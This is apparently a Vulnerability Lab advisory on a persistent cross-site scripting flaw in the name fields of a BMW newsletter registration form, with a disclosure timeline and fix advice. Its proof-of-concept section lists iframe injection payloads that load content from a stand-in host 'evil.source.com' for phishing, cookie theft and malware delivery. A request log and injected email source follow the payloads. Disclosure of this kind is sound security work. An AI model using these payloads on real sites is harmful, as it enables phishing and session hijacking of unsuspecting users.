Share
## https://sploitus.com/exploit?id=PACKETSTORM:164649
Document Title:  
===============  
BMW Online (Mail) - Persistent Web Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2262  
  
Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2021/10/19/bmw-mail-persistent-validation-vulnerability  
  
  
Release Date:  
=============  
2021-10-19  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
2262  
  
  
Common Vulnerability Scoring System:  
====================================  
5.9  
  
  
Vulnerability Class:  
====================  
Cross Site Scripting - Persistent  
  
  
Current Estimated Price:  
========================  
1.000€ - 2.000€  
  
  
Product & Service Introduction:  
===============================  
Die Bayerische Motoren Werke Aktiengesellschaft (BMW AG) ist ein weltweit operierender, börsennotierter Automobil- und Motorradhersteller mit Sitz in MĂŒnchen,  
der unter dem Markennamen BMW Group auftritt. Die Produktpalette umfasst die Automobil- und Motorrad-Marke BMW, die Automarken Mini und Rolls-Royce sowie die  
BMW-Submarken BMW M und BMW i.  
  
Der Konzern hat sich vor allem seit den 1960er Jahren unter der Marke BMW als Hersteller hochpreisiger, komfortabel ausgestatteter und gut motorisierter Reisewagen  
mit sportlichem Anspruch einen Namen gemacht und zĂ€hlt damit zu den sogenannten Premiumherstellern. Daneben zielt die Marke Mini mit Retro-Modellen auf jĂŒngere,  
lifestyle-orientierte Kundschaft ab, wĂ€hrend bei Rolls-Royce in geringer StĂŒckzahl höchstpreisige Luxuslimousinen entstehen. Die Kernmarke BMW geht auf die 1913  
durch Karl Rapp in MĂŒnchen gegrĂŒndeten Rapp Motorenwerke zurĂŒck. Sie wurden durch Franz Josef Popp ab 1917 ausgebaut und firmierten ab 1918 als Aktiengesellschaft  
Bayerische Motorenwerke sowie ab 1920 als SĂŒddeutsche Bremsen-AG. Die Motorenbau-Abteilung und der alte Unternehmensname wurden 1922 verkauft und in die 1916  
begrĂŒndete Bayerische Flugzeugwerke AG eingegliedert, die seitdem als BMW firmiert.  
  
BMW gehört mit 104,2 Milliarden Euro Umsatz und rund 134.000 BeschĂ€ftigten im GeschĂ€ftsjahr 2019 zu den grĂ¶ĂŸten Wirtschaftsunternehmen Deutschlands und zĂ€hlte  
mit einer Jahresproduktion von 2,54 Millionen Fahrzeugen im Jahr 2019 zu den 15 grĂ¶ĂŸten Autoherstellern der Welt. Das Unternehmen ist sowohl mit Stamm- als  
auch Vorzugsaktien an der Börse notiert, wobei die Stammaktie im deutschen Leitindex DAX sowie im DivDAX vertreten ist. GrĂ¶ĂŸte Anteilseigner mit zusammen etwa  
46,8 % sind Susanne Klatten und Stefan Quandt, die der Industriellenfamilie Quandt angehören. DarĂŒber hinaus ist BMW auch 2018 in den Nachhaltigkeitsindeces  
Dow Jones Sustainability Indices (DJSI) „World“ und „Europe“ sowie FTSE4Good gelistet.  
  
(Copy of the Homepage: https://de.wikipedia.org/wiki/BMW )  
  
  
Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the BMW online service web-application.  
  
  
Affected Product(s):  
====================  
BMW  
Product: Mailing Server - Online Service (Web-Application) 2020 Q1  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2020-06-04: Researcher Notification & Coordination (Security Researcher)  
2020-06-05: Vendor Notification (BMW-CERT Department)  
2020-08-27: Vendor Response/Feedback (BMW-CERT Department)  
2021-10-10: Vendor Fix/Patch by Check (BMW Service Developer Team)  
2021-**-**: Security Acknowledgements (BMW-CERT Department)  
2021-10-19: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
Authentication Type:  
====================  
Restricted Authentication (User Privileges)  
  
  
User Interaction:  
=================  
Low User Interaction  
  
  
Disclosure Type:  
================  
Bug Bounty  
  
  
Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the official BMW online service portal web-application.  
Guests are able to inject own malicious script codes on the application-side of the vulnerable service module to compromise emails  
or delivered content via the sender.  
  
The vulnerability is located in the `firstname` and `lastname` value parameters of the `mail` module. The vulnerable parameters are  
insecure sanitized next to being delivered inside of a basic html mail template.  
  
Remote attackers are able to inject own malicious script code via POST method request to the application-side of the bmw domain mailing service.  
The attack vector of the vulnerability is persistent on the application-side and the request method to inject is POST. The attacker does not need  
to be directly authenticated because its only an initial registration without direct activiation request. The injection points are the vulnerable  
input fields in the BMW 4er Coupé registration formular and the execution of the malform injected code takes place in the `mail.bmw.de`, `m.mail.bmw.de`  
domains with the unique `/jsp/m.jsp` file by a client-side GET method request.  
  
The issue affects all pages listed with the newsletter module. The vulnerability allows email spoofing, phishing, spamming, cross site requests for  
redirects to malware or exploits and persistent manipulation of bmw domain (email) contents. A targeted user can not see that the manipulated website  
is insecure because of the trusted native source that deliveres the contexts over the bmw mailing (mail.bmw.de).  
  
The exploitation of the persistent input validation web vulnerability requires no or low user inter action and no privileged application user account.  
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious sources  
and persistent manipulation of affected web module context.  
  
Request Method(s):  
[+] POST  
  
Vulnerable Module(s):  
[+] BMW 4er Coupé - Registration Formular  
  
Vulnerable Input(s):  
[+] Vorname (Firstname)  
[+] Nachname (Lastname)  
  
Vulnerable Section(s):  
[+] CONTENT  
  
Vulnerablke File(s):  
[+] m.jsp  
  
Affected Domain(s):  
[+] mail.bmw.de  
[+] m.mail.bmw.de  
  
  
Proof of Concept (PoC):  
=======================  
The vulnerability can be exploited by remote attackers with low privileged application user account and medium required user interaction.  
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.  
  
  
Payload: Phishing  
test"><iframe src=http://www.evil.source.com/poc.html></iframe>  
  
  
Payload: Session Hijacking  
test"><iframe src=http://www.evil.source.com/ onload=alert(document.cookie)></iframe>  
test"><iframe src=http://www.evil.source.com/ onload=alert(document.domain)></iframe>  
  
  
Payload: Malware or Exploit  
test"><iframe src=http://www.evil.source.com/poc.js></iframe>  
  
  
Payload: Redirect  
test"><window.frames["myFrame"].location = "http://...">  
  
  
PoC: Demo URLs (Examples Non Malicious!)  
https://m.mail.bmw.de/nl/jsp/m.jsp?c=%40Pv0kZwbsXqBiXLjqfLfhjQcmFl03K6l5EVY0L9chpQk%3D  
  
  
--- PoC Session Logs (GET) [Execute] ---  
https://m.mail.bmw.de/nl/jsp/m.jsp?c=%40Pv0kZwbsXqBiXLjqfLfhjQcmFl03K6l5EVY0L9chpQk%3D  
Host: m.mail.bmw.de  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
Connection: keep-alive  
Cookie: uuid230=e171a7d5-3065-4691-9e39-dc051d6b6bb2; nlid=59b025|bd9a2846; bmwdtm_hq_userdata=lo:not logged in;  
v_reco_data={"user":"returning","last_channel":"other","pages_viewed":{"https://www.bmw.de/de/index.html":2,  
"https://configure.bmw.de/de_DE/configure/G22/11AP/FKFSW,P0668,S01S3":1},"site_sections_viewed":{"Index":2,"Configurator":1},  
"session_duration":"622","configurator_session_duration":"8"}; at_check=true; bmwdtm_hq_vs=1591355369; s_lv=1591358075425; _cs_mk=0.8202769905305621_1591355369096;  
_cs_c=1; _cs_id=d1d6f4a2-9e37-a0cf-fd19-495b95a51ace.1591355370.2.1591358075.1591358046.1.1625519370460.Lax.0;  
AMCV_B52D1CFE5330949C0A490D45%40AdobeOrg=1585540135%7CMCMID%7C43471724831001338048363975029512836080%7CMCAID%7CNONE%7CMCOPTOUT-1591365306s%7CNONE%7CvVersion%7C4.4.0;  
AMCVS_B52D1CFE5330949C0A490D45%40AdobeOrg=1;  
s_ppvl=all-models%2520%253E%25204-series%2520%253E%2520coupe%2520%253E%25202020%2520%253E%2520bmw-4-series-coupe-highlights%2C93%2C65%2C6927%2C1920%2C884%2C1920%2C1080%2C1%2CP;  
s_ppv=all-models%2520%253E%25204-series%2520%253E%2520coupe%2520%253E%25202020%2520%253E%2520bmw-4-series-coupe-models-equipment%2C100%2C100%2C7283%2C1920%2C884%2C1920%2C1080%2C1%2CP;  
s_cc=true; dtTransferCookie==3=srv=2=sn=V9BCJG98FF13N2R0E8BB33TB9RSRD9AS=app:d6bac8ba1bbb22f2=1=ol=0=perc=100000=mul=1;  
check=true; s_fid=%20;  
last_config=%7B%22modelrange%22%3A%22G22%22%2C%22modelcode%22%3A%2211AP%22%2C%22ag_modelcode%22%3A%2211AP%22%2C%22brand%22%3A%22bmwCar%22%2C%22pain  
t%22%3A%22P0668%22%2C%22rim%22%3A%22S01S3%22%2C%22fabric%22%3A%22FKFSW%22%2C%22options%22%3A%22FKFSW%2CP0668%2CS01CB%2CS01DF%2CS01S3%2CS0205%2CS0230  
%2CS0255%2CS02PA%2CS02VB%2CS0428%2CS0431%2CS0493%2CS04AT%2CS04NE%2CS0508%2CS0534%2CS0544%2CS0548%2CS05AQ%2CS05DA%2CS0654%2CS06AE%2CS06AF%2CS06AK%2CS0  
6C4%2CS06U2%2CS0801%2CS0851%2CS0879%2CS08KA%2CS08TF%2CS09QX%22%2C%22brandCosy%22%3A%22WBBM%22%7D; _pin_unauth=dWlkPU1ETXdNalZpTkRBdE9UQXhZUzAwWWpobUxX  
STFaRE10WTJFM01XVm1PVEUxWVdRMg; mbox=session#caf2ce2d3adc47609e4fa1ac588d1a00#1591359906; bmwdtm_hq_sid=k55b3hBo5kgb;  
bmwdtm_hq_pcg=topics%7Ctopics%20%3E%20fascination-bmw%7Ctopics%20%3E%20fascination-bmw%20%3E%20efficient-dynamics%7Ctopics%20%3E%20fascination-  
bmw%20%3E%20efficient-dynamics%20%3E%20consumption-and-emissions%7Cconsumption-and-emissions; s_lv_s=Less%20than%201%20day; _cs_s=3.1  
-  
GET: HTTP/1.1 200 OK  
Content-Encoding: gzip  
Content-Type: text/html; charset=utf-8  
Date: Fri, 05 Jun 2020 11:57:59 GMT  
Server: Apache  
Vary: Accept-Encoding  
X-Robots-Tag: noindex  
X-UA-Compatible: IE=edge  
Content-Length: 9916  
Connection: keep-alive  
  
  
  
PoC: Source (Email & Web Pages)  
<!-- start CONTENT -->  
<table border="0" cellpadding="0" cellspacing="0" role="presentation" width="100%">  
<tbody>  
<tr>  
<td align="center"><!--[if (gte mso 9)|(IE)]>  
<table role="presentation" align="center" border="0" cellspacing="0" cellpadding="0" width="600">  
<tr>  
<td align="center" valign="top" width="700">  
<![endif]-->  
<table align="center" border="0" cellpadding="0" cellspacing="0" role="presentation" style="max-width: 700px; background-color: #ffffff;" width="100%" bgcolor="#ffffff">  
<tbody>  
<tr>  
<td align="center">  
<!-- Place next article here -->  
<!-- start EDITORIAL -->  
<table role="presentation" border="0" cellpadding="0" cellspacing="0" width="100%">  
<tr>  
<td style="padding: 55px 0px 0px 0px;" width="100%">  
<table role="presentation" border="0" cellpadding="0" cellspacing="0" width="100%">  
<!-- start salutation -->  
<tr>  
<td align="left" class="mob-pad-l-r" style="color: #000000;font-family: 'BMW-Light', Arial, sans-serif; font-size: 24px;line-height: 30px;font-weight: 300;padding: 0px 30px 20px 30px;">  
Sehr geehrter Herr Dr. B>"<Iframe%20Src=evil.source%20onload=alert(document.domain)>[VORNAME|NACHNAME - EXCUTION POINT!],  
  
  
Reference(s):  
https://www.bmw.de/de/ssl/requests/rfo-bmw.html#/dlo#%2Fbrand=BM&configId=g8f8j3l6&ucpBaseurl=https:%2F%2Fprod.ucp.bmw.cloud  
https://www.bmw.de/de/ssl/requests/brand-switch-rfi/rfi-type-switch-bmw/rfi-post-bmw.html#/brand=BM&configId=g8f8j3l6&ucpBaseurl=https://prod.ucp.bmw.cloud  
  
  
Solution - Fix & Patch:  
=======================  
1. The vulnerability can be patched by a parse and encode of the vulnerable `firstname`, `lastname` input fields in all the affected newsletter registration forms.  
  
2. Restrict the affected input fields and disallow the usage of special chars to prevent malicious script code injection attacks.  
  
3. Escape or safe encode the name parameter content in the html generated template on the affected bmw mailing or unique domain page.  
  
4. Sanitize in the outgoing emails through the bmw mail server the affected name parameters to finally resolve the vulnerability.  
  
5. Due to the manipulation of the content with persistent vector the inner security mechanics should already have noted you about our interaction.  
Normally when a user changes the contents the page links needs to be checked for malware or suspicious activities. In thus case our attack was invisible for the cert which could assist to readjust  
  
  
Note: https://www.vulnerability-db.com/?q=articles/2021/10/19/bmw-mail-persistent-validation-vulnerability  
  
  
Security Risk:  
==============  
The security risk of the persistent input validation web vulnerability in the web-application module is estimated as medium.  
The vulnerability can be used to produce malicious and malformed content to phish or exploit user session data the easy way.  
The targeted users can not see that the delivered contents are not from the original bmw source. The user does not need to  
verify his registration which allows to perform the attack against other accounts in a simple way.  
  
  
Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.  
  
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com  
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com  
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab  
  
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.  
  
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]ℱ  
  
  
  
--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE  
LUDWIG-ERHARD STRAßE 4  
34131 KASSEL - HESSEN  
DEUTSCHLAND (DE)